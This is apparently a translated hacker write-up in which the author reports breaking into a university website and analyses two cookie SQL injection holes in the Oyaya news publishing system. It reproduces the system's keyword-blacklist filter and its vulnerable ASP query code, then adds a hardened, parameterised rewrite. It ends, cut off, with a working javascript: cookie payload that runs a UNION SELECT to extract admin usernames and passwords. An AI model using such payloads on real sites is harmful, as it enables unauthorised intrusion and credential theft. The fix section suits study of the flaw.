Hacknote
When I broke into a local university website last night, I found a sub-site running the Oyaya news publishing system. At the time I could find no vulnerabilities for this system on the Internet, so I downloaded a copy of 4.7 ACC to study it. After more than half an hour of research I finally found two injection vulnerabilities. Later I remembered that 0-days for this system had been published on the Black Bar forum, but they were all for old versions, or not very practical at all. I guessed at the time that someone had discovered the vulnerabilities in this system long ago, but nobody had disclosed them. Just imagine: such obvious vulnerabilities, and the experts never saw them. Now that I have found them, I will release them and analyze the vulnerable code in detail.
Both vulnerabilities in this system are cookie injections. First, let's look at the anti-injection code:
<%
Dim Query_Badword, Form_Badword, I, Err_Message, Err_Web, name, Chk_badword, Query_Name
'------ Definition section start --------------------------------------------------------------
Err_Message = 1                    ' handling method: 1 = show a message, 2 = redirect, 3 = message, then redirect
'Err_Web = "Err.asp"               ' page to redirect to on error (alternative)
Err_Web = "http://www.oyaya.net"   ' page to redirect to on error
' Banned words for GET parameters, separated by "|"
' (keyword list reconstructed from the garbled translation and the alert text below)
Query_Badword = "'|and|select|update|chr|delete|%20from|;|insert|mid|master.|set|chr(37)|="
' Banned words for POST parameters, separated by "|"
'Form_Badword = ""
Form_Badword = "'|%|&|*|#|=|or"
'------ Definition section end ----------------------------------------------------------------
On Error Resume Next
'----- Filter the GET query string values
If Request.QueryString <> "" Then
    Chk_badword = Split(Query_Badword, "|")
    For Each Query_Name In Request.QueryString
        For I = 0 To UBound(Chk_badword)
            If InStr(LCase(Request.QueryString(Query_Name)), Chk_badword(I)) <> 0 Then
                Select Case Err_Message
                    Case "1"
                        Response.Write "<Script Language=JavaScript>alert('Parameter passing error! The value of the parameter " & Query_Name & " contains an invalid string! Do not include invalid characters such as: and update delete ; insert mid master in the parameter!');window.close();</Script>"
                    Case "2"
                        Response.Write "<Script Language=JavaScript>location.href='" & Err_Web & "'</Script>"
                    Case "3"
                        Response.Write "<Script Language=JavaScript>alert('Parameter passing error! The value of the parameter " & Query_Name & " contains an invalid string! Do not include invalid characters such as: and update delete ; insert mid master in the parameter!');location.href='" & Err_Web & "';</Script>"
                End Select
                Response.End
            End If
        Next
    Next
End If
'----- Filter the POST form values
If Request.Form <> "" Then
    Chk_badword = Split(Form_Badword, "|")
    For Each name In Request.Form
        For I = 0 To UBound(Chk_badword)
            If InStr(LCase(Request.Form(name)), Chk_badword(I)) <> 0 Then
                Select Case Err_Message
                    Case "1"
                        Response.Write "<Script Language=JavaScript>alert('Error! The value of form field " & name & " contains an invalid string! Please do not include illegal characters such as % & * # ( ) in the form!');window.close();</Script>"
                    Case "2"
                        Response.Write "<Script Language=JavaScript>location.href='" & Err_Web & "'</Script>"
                    Case "3"
                        Response.Write "<Script Language=JavaScript>alert('Error! The value of form field " & name & " contains an invalid string! Please do not include illegal characters such as % & * # ( ) in the form!');location.href='" & Err_Web & "';</Script>"
                End Select
                Response.End
            End If
        Next
    Next
End If
%>
This generic anti-injection script clearly filters GET and POST input, so direct injection through those channels is practically useless here. What it does not filter at all is the cookie. We only need to find a place where a variable is read with the bare Request("xx") form (no collection specified), which also reads cookies, and is then concatenated into a SQL statement. After a careful search we found two such locations; the first is the Download.asp file.
Download.asp is the list file that displays all downloads. The detail of the list is produced by the call ShowDown(32), which invokes the ShowDown function in Include/SysDown.asp. Let's look at the Include/SysDown.asp file and the code of the ShowDown function.
<%
Dim strFileName, MaxPerPage, ShowSmallClassType
......
BeginTime = Timer
' Read with the bare Request() form: no collection is specified
BigClassName = Trim(Request("BigClassName"))
SmallClassName = Trim(Request("SmallClassName"))
Keyword = Trim(Request("keyword"))
If Keyword <> "" Then
    ' Nested Replace calls; the arguments of the fourth pair are illegible in the source
    Keyword = Replace(Replace(Replace(Replace(Keyword, "'", "''"), "<", "&lt;"), ">", "&gt;"), "", "")
End If
StrField = Trim(Request("Field"))
......
%>
The above code appears at the start of Include/SysDown.asp. Clearly the values of BigClassName and SmallClassName are read directly with the Request method, without specifying which collection of the Request object they come from. As for filtering, only the Trim function is applied, which strips the spaces on both sides. Now we need to find where BigClassName or SmallClassName is brought directly into a SQL statement. Let's continue with the ShowDown function, the list display function used by Download.asp. The code is as follows:
Sub ShowDown(TitleLen)
    ............
    If currentPage = 1 Then
        SqlDown = "select top " & MaxPerPage
    Else
        SqlDown = "select"
    End If
    SqlDown = SqlDown & " ID, title, content, BigClassName, SmallClassName, System, Language, Softclass, PhotoUrl, DownloadUrl, FileSize, Hits, AddDate from download"
    ' The class names are spliced straight into the statement
    If BigClassName <> "" Then
        SqlDown = SqlDown & " where BigClassName='" & BigClassName & "'"
        If SmallClassName <> "" Then
            SqlDown = SqlDown & " and SmallClassName='" & SmallClassName & "'"
        End If
    End If
    SqlDown = SqlDown & " order by AddDate desc"
    Set rsDown = Server.CreateObject("ADODB.Recordset")
    rsDown.Open SqlDown, conn, 1, 1
    If rsDown.BOF And rsDown.EOF Then
        Response.Write("<br><li>NO downloads</li>")
    Else
        ............
End Sub
The values of BigClassName and SmallClassName go straight into the query. Nothing before this point sanitises BigClassName or SmallClassName, so we can inject through BigClassName using a cookie.
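As an added example (not code from the original Oyaya SysDown.asp), here is how the ShowDown query construction above can be hardened, which also closes the cookie gap left by the anti-injection script shown earlier. It reads the class names from an explicit collection instead of the bare Request("x") form, which in classic ASP falls back through QueryString, Form, Cookies, ClientCertificate and ServerVariables in that order, and it binds the values as ADODB parameters instead of concatenating them. The names conn, MaxPerPage and currentPage are assumed to exist as in the original include file; ShowDownSafe is a hypothetical name chosen for this example.

```vbscript
<%
' Added example, not the original ShowDown: the same listing query built safely.
' Assumes conn (open ADODB.Connection), MaxPerPage and currentPage exist as in
' the original Include/SysDown.asp.
Sub ShowDownSafe(TitleLen)
    Dim BigClassName, SmallClassName, SqlDown, cmd, rsDown

    ' 1. Read from a named collection. The bare Request("x") form also returns
    '    cookie values, which the GET/POST blacklist never inspects.
    BigClassName   = Trim(Request.QueryString("BigClassName"))
    SmallClassName = Trim(Request.QueryString("SmallClassName"))

    ' 2. TOP n cannot be bound as a parameter, so force it to a number first.
    If currentPage = 1 Then
        SqlDown = "SELECT TOP " & CLng(MaxPerPage) & " "
    Else
        SqlDown = "SELECT "
    End If
    SqlDown = SqlDown & "ID, title, content, BigClassName, SmallClassName, System, Language, " & _
              "Softclass, PhotoUrl, DownloadUrl, FileSize, Hits, AddDate FROM download"

    ' 3. Use placeholders and bind the user-supplied values; the database driver
    '    treats them as data, never as SQL text.
    Set cmd = Server.CreateObject("ADODB.Command")
    Set cmd.ActiveConnection = conn
    cmd.CommandType = 1                       ' adCmdText

    If BigClassName <> "" Then
        SqlDown = SqlDown & " WHERE BigClassName = ?"
        ' CreateParameter(Name, Type, Direction, Size, Value): 200 = adVarChar, 1 = adParamInput
        cmd.Parameters.Append cmd.CreateParameter("BigClassName", 200, 1, 255, BigClassName)
        If SmallClassName <> "" Then
            SqlDown = SqlDown & " AND SmallClassName = ?"
            cmd.Parameters.Append cmd.CreateParameter("SmallClassName", 200, 1, 255, SmallClassName)
        End If
    End If
    SqlDown = SqlDown & " ORDER BY AddDate DESC"
    cmd.CommandText = SqlDown

    ' Keep the same cursor/lock types as the original (1 = adOpenKeyset, 1 = adLockReadOnly)
    Set rsDown = Server.CreateObject("ADODB.Recordset")
    rsDown.Open cmd, , 1, 1

    If rsDown.BOF And rsDown.EOF Then
        Response.Write "<br><li>NO downloads</li>"
    Else
        ' ... render the rows exactly as the original ShowDown does ...
    End If

    rsDown.Close
    Set rsDown = Nothing
    Set cmd = Nothing
End Sub
%>
```

Because each value is bound as a parameter, a cookie or query string containing quotes, "and 1=2", "union" or any other keyword is compared literally against the BigClassName column, so the blacklist becomes unnecessary rather than merely incomplete. Reading from Request.QueryString is still worth doing separately: it makes the accepted input channel explicit, which is what the original code and its filter disagreed about.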
Code:
javascript:alert(document.cookie="BigClassName="+escape("%25 and 1=2 union select 1,admin,3,password,5,6,7,8,9,10,11,12,13 from admin wher